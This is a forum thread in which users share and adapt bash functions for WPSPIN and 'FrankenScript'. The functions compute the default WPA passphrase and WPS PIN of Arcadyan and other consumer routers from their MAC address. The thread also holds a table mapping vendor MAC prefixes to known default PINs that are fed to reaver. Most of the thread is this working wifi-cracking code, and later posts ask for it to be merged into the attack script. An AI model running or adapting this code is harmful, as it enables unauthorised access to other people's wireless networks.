i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )
Code:ARCADYAN(){ # WPSPIN 1.5 - GPL v 3 by kcdtv # This function uses three amazing works # 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc # 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51 # 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com) # # Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code # This function is based on the script easybox_keygen.sh previously mentioned # # The quotation from the original work start with double dash and are beetwen quotes # Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA # the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged" # This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX) # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to # give the full WPS PIN ($PIN) ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged K1=$((($c1)%16)) ######unchanged K2=$((($c2)%16)) ######unchanged X1=$((K1^${deci[3]})) ######unchanged X2=$((K1^${deci[2]})) ######unchanged X3=$((K1^${deci[1]})) ######unchanged Y1=$((K2^0x${hexi[1]})) ######unchanged Y2=$((K2^0x${hexi[2]})) ######unchanged Y3=$((K2^0x${hexi[3]})) ######unchanged Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged Z3=$((K1^K2)) ######unchanged STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass CHECKSUM }
I put you back CHECKSUM in case it helps you
Code:CHECKSUM(){ # The function checksum was written for bash by antares_145 form crack-wifi.com PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN) ACCUM=0 # to get a result using this function) ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc.... ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control " PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000 } # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if yiou have any question about it do not hesitate to ask
cheers
Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please fee free to add any credits or such.
Code:#!/bin/bash # # # ##################################################################### AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt) AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt) ESSID=$(echo $AP_essid) BSSID=$(echo $AP_bssid) ##################################################################### FUNC_CHECKSUM(){ ACCUM=0 ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` DIGIT=`expr $ACCUM '%' 10` CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` PIN=`expr $PIN '+' $CHECKSUM` ACCUM=0 ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'` RESTE=`expr $ACCUM '%' 10` } CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':') FINBSSID=$(echo $BSSID | cut -d ':' -f4-) MAC=$(echo $FINBSSID | tr -d ':') CONVERTEDMAC=$(printf '%d\n' 0x$MAC) FINESSID=$(echo $ESSID | cut -d '-' -f2) PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':') CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':') MACESSID=$(echo $PAREMAC$FINESSID) STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PINWPS1=$(printf '%08d\n' $PIN) STRING2=`expr $STRING '+' 8` PIN=`expr 10 '*' $STRING2` FUNC_CHECKSUM PINWPS2=$(printf '%08d\n' $PIN) STRING3=`expr $STRING '+' 14` PIN=`expr 10 '*' $STRING3` FUNC_CHECKSUM PINWPS3=$(printf '%08d\n' $PIN) if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]]; then CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID) RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'` STRING4=`expr $RAIZ '+' 7` PIN=`expr 10 '*' $STRING4` FUNC_CHECKSUM PINWPS4=$(printf '%08d\n' $PIN) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 " PIN4REAVER=$PINWPS4 else case $CHECKBSSID in 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 $RED"Other Possible Pin"$RED:$STAND $PINWPS2 $RED"Other Possible Pin"$RED:$STAND $PINWPS3" PIN4REAVER=$PINWPS1 ;; 001915) echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670" PIN4REAVER=12345670 ;; 404A03) echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428" PIN4REAVER=11866428 ;; F43E61 | 001FA4) echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670" PIN4REAVER=12345670 ;; 001A2B) if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760" PIN4REAVER=88478760 else echo -e "PIN POSSIBLE... > $PINWPS1" PIN4REAVER=$PINWPS1 fi ;; 3872C0) if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486" PIN4REAVER=18836486 else echo -e "PIN POSSIBLE > $PINWPS1" PIN4REAVER=$PINWPS1 fi ;; FCF528) echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761" PIN4REAVER= 20329761 ;; 3039F2) echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917" PIN4REAVER=16538061 ;; A4526F) echo -e "several possible PINs, ranked in order> 16538061 88202907 73767053 16702738 43297917 18355604 " PIN4REAVER=16538061 ;; 74888B) echo -e "several possible PINs, ranked in order> 43297917 73767053 88202907 16538061 16702738 18355604" PIN4REAVER=43297917 ;; DC0B1A) echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917" PIN4REAVER=16538061 ;; 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 " PIN4REAVER=$PINWPS1 ;; 002275) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 08863B) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 001CDF) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 00A026) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 5057F0) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; C83A35 | 00B00C | 081075) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; E47CF9 | 801F02) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 0022F7) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; *) PIN4REAVER=$PINWPS1 ;; esac fi
Last edited by slim76; 2014-01-30 at 03:09.
you should collect the arcadyan mac to redact your case in condition
where you have the X you put the 6 first digit of aracdyan the mac without the 2 pointsCode:;; XXXXXX | XXXXXX)
and then you generate string
than you generate the checksum to get the full PINCode:deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) K1=$((($c1)%16)) K2=$((($c2)%16)) X1=$((K1^${deci[3]})) X2=$((K1^${deci[2]})) X3=$((K1^${deci[1]})) Y1=$((K2^0x${hexi[1]})) Y2=$((K2^0x${hexi[2]})) Y3=$((K2^0x${hexi[3]})) Z1=$((0x${hexi[2]}^${deci[3]})) Z2=$((0x${hexi[3]}^${deci[2]})) Z3=$((K1^K2)) STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
Code:PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PIN4REAVER=$(printf '%08d\n' $PIN)
that will give you
Code:;; XXXXXX | XXXXXX) deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) K1=$((($c1)%16)) K2=$((($c2)%16)) X1=$((K1^${deci[3]})) X2=$((K1^${deci[2]})) X3=$((K1^${deci[1]})) Y1=$((K2^0x${hexi[1]})) Y2=$((K2^0x${hexi[2]})) Y3=$((K2^0x${hexi[3]})) Z1=$((0x${hexi[2]}^${deci[3]})) Z2=$((0x${hexi[3]}^${deci[2]})) Z3=$((K1^K2)) STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PIN4REAVER=$(printf '%08d\n' $PIN)
taht you have to place in your case esac sentence, anywhere untill it is before
Code:;; *)
Sorry mate I mean't would you be able to amend the script I posted so I only have to paste it back into FrankenScript.
I know its kinda cheeky to ask, sorry. :-)
I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL